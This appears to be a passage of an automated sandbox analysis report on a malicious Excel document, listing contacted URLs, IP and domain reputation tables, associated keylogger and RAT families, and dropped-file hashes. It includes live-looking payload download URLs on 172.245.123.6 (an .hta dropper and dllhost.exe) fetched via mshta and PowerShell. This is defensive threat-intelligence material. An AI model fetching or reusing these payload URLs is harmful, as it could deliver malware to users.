                                                          http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                          http://172.245.123.6/Omshta.exe, 00000004.00000003.417457596.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.0000000003091000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.420401597.0000000003091000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://reallyfreegeoip.org/xml/8.46.123.33PLZRegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://172.245.123.6/770/dllhost.exespowershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.482999826.000000001C264000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                              http://172.245.123.6/770/dllhost.exeppowershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://172.245.123.6/770/dllhost.exes?epowershell.exe, 00000011.00000002.482999826.000000001C264000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://reallyfreegeoip.orgRegSvcs.exe, 0000000E.00000002.630259466.00000000026AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002700000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002606000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002649000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.630259466.0000000002696000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002499000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002448000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024B6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024FF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024AE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.00000000024C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.630215962.0000000002405000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta8Amshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C1B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaWmshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://172.245.123.6/770/dllhostpowershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          132.226.8.169
                                                                          		unknownUnited States
                                                                          		16989UTMEMUSfalse
                                                                          104.21.78.54
                                                                          		unknownUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          172.245.123.6
                                                                          		unknownUnited States
                                                                          		36352AS-COLOCROSSINGUStrue
                                                                          188.114.97.3
                                                                          		unknownEuropean Union
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          193.122.6.168
                                                                          		unknownUnited States
                                                                          		31898ORACLE-BMC-31898USfalse
                                                                          188.114.96.3
                                                                          		reallyfreegeoip.orgEuropean Union
                                                                          		13335CLOUDFLARENETUStrue
                                                                          193.122.130.0
                                                                          		checkip.dyndns.comUnited States
                                                                          		31898ORACLE-BMC-31898USfalse
                                                                          158.101.44.242
                                                                          		unknownUnited States
                                                                          		31898ORACLE-BMC-31898USfalse
                                                                          172.67.216.244
                                                                          		og1.inUnited States
                                                                          		13335CLOUDFLARENETUSfalse
                                                                          132.226.247.73
                                                                          		unknownUnited States
                                                                          		16989UTMEMUSfalse

                                                                          General Information

                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1522511
                                                                          Start date and time:2024-09-30 10:11:01 +02:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 7m 26s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                          Number of analysed new started processes analysed:26
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • GSI enabled (VBA)
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:SYSN ORDER.xls
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.spyw.expl.evad.winXLS@27/30@46/10
                                                                          EGA Information:
                                                                          • Successful, ratio: 60%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 55
                                                                          • Number of non-executed functions: 40
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .xls
                                                                          • Found Word or Excel or PowerPoint or XPS Viewer
                                                                          • Attach to Office via COM
                                                                          • Active ActiveX Object
                                                                          • Active ActiveX Object
                                                                          • Scroll down
                                                                          • Close Viewer

                                                                          Warnings

                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                          • Execution Graph export aborted for target mshta.exe, PID 3624 because there are no executed function
                                                                          • Execution Graph export aborted for target mshta.exe, PID 3996 because there are no executed function
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                          Simulations

                                                                          Behavior and APIs

                                                                          TimeTypeDescription
                                                                          04:12:18API Interceptor101x Sleep call for process: mshta.exe modified
                                                                          04:12:22API Interceptor159x Sleep call for process: powershell.exe modified
                                                                          04:12:43API Interceptor28671x Sleep call for process: RegSvcs.exe modified

                                                                          Joe Sandbox View / Context

                                                                          IPs

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          132.226.8.16958ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          new shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          VbcXXnmIwPPhh.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          104.21.78.54PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                            PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                              PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  172.245.123.6GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                  • 172.245.123.6/600/dllhost.exe
                                                                                  Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 172.245.123.6/xampp/co/IEnetbookscookiess.hta
                                                                                  REMITTANCE ADVICE.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 172.245.123.6/xampp/co/IEnetbookscookiess.hta
                                                                                  Pedido de GmbH.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 172.245.123.6/xampp/gb/IEnetworkCookies.hta

                                                                                  Domains

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  og1.inPO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.216.244
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 104.21.78.54
                                                                                  reallyfreegeoip.orgSecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  checkip.dyndns.comSecuriteInfo.com.Trojan.PackedNET.3066.19627.4428.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.6.168
                                                                                  58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 158.101.44.242
                                                                                  new shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  SecuriteInfo.com.Trojan.AutoIt.1503.25057.26595.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  .05.2024.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 193.122.130.0
                                                                                  GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                  • 132.226.8.169

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  CLOUDFLARENETUSPO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.216.244
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 172.67.216.244
                                                                                  RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  https://form.asana.com/?k=SVzOAgf254NWBNm-dO6Wfg&d=1208255323046871Get hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.74.152
                                                                                  UTMEMUS58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  new shipment.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  update SOA.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  GfGxum1sf3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  #docs_8299010377388200191-pdf.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 132.226.8.169
                                                                                  QUOTATION_SEPQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 132.226.247.73
                                                                                  CLOUDFLARENETUSPO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.216.244
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 172.67.216.244
                                                                                  RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  https://form.asana.com/?k=SVzOAgf254NWBNm-dO6Wfg&d=1208255323046871Get hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.74.152
                                                                                  AS-COLOCROSSINGUSPI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.168.7.7
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.168.7.7
                                                                                  PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 107.173.4.16
                                                                                  ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                                  • 192.3.101.137
                                                                                  http://jeevankiranfoundationcenter.co.in/css/rrp.htmGet hashmaliciousKutakiBrowse
                                                                                  • 23.94.221.14
                                                                                  C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 104.168.32.148
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                                  • 107.172.130.147
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 192.3.101.29
                                                                                  PO.xlsGet hashmaliciousRemcosBrowse
                                                                                  • 104.168.32.148
                                                                                  GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                  • 172.245.123.6

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  05af1f5ca1b87cc9cc9b25185115607dC6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
                                                                                  dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
                                                                                  58ADE05412907F657812BDA267C43288EA79418091.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  New Order.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  0225139776.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 188.114.96.3
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                                  • 188.114.96.3
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
                                                                                  PO.xlsGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
                                                                                  Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.96.3
                                                                                  7dcce5b76c8b17472d024758970a406bPO554830092024.xlsGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  Gelato Italiano_74695.exe.exeGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  dvswiftsend_240917122612_9331095243.docx.docGet hashmaliciousRemcosBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  PO.xlsGet hashmaliciousRemcosBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  Shipping Document.docx.docGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  FACTORY NEW PURCHASE ORDER.docGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244
                                                                                  Payment Advice.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                  • 104.21.78.54
                                                                                  • 172.67.216.244

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):15189
                                                                                  Entropy (8bit):5.0343247648743
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
                                                                                  MD5:7BC3FB6565E144A52C5F44408D5D80DF
                                                                                  SHA1:C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
                                                                                  SHA-256:EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
                                                                                  SHA-512:D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
                                                                                  Malicious:false
                                                                                  Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):0.34726597513537405
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlll:Nll
                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                  Malicious:false
                                                                                  Preview:@...e...........................................................

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbokkworkingforupdate[1].hta

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):118448
                                                                                  Entropy (8bit):2.545087808141809
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Ea+QQy2y1m70sy1mHs5QUhy1m1y1mnry1miT:8QMwm70swmH4fhwm1wmnrwmC
                                                                                  MD5:99024900ACA349D8835D7624429F64DB
                                                                                  SHA1:37F8462F487263BCFA94FBF4363D7353E8A56BD1
                                                                                  SHA-256:61A705631D7530FAC4402761DEA90CDD3F217C66AF6E9F81E6A916EAD3F8CABB
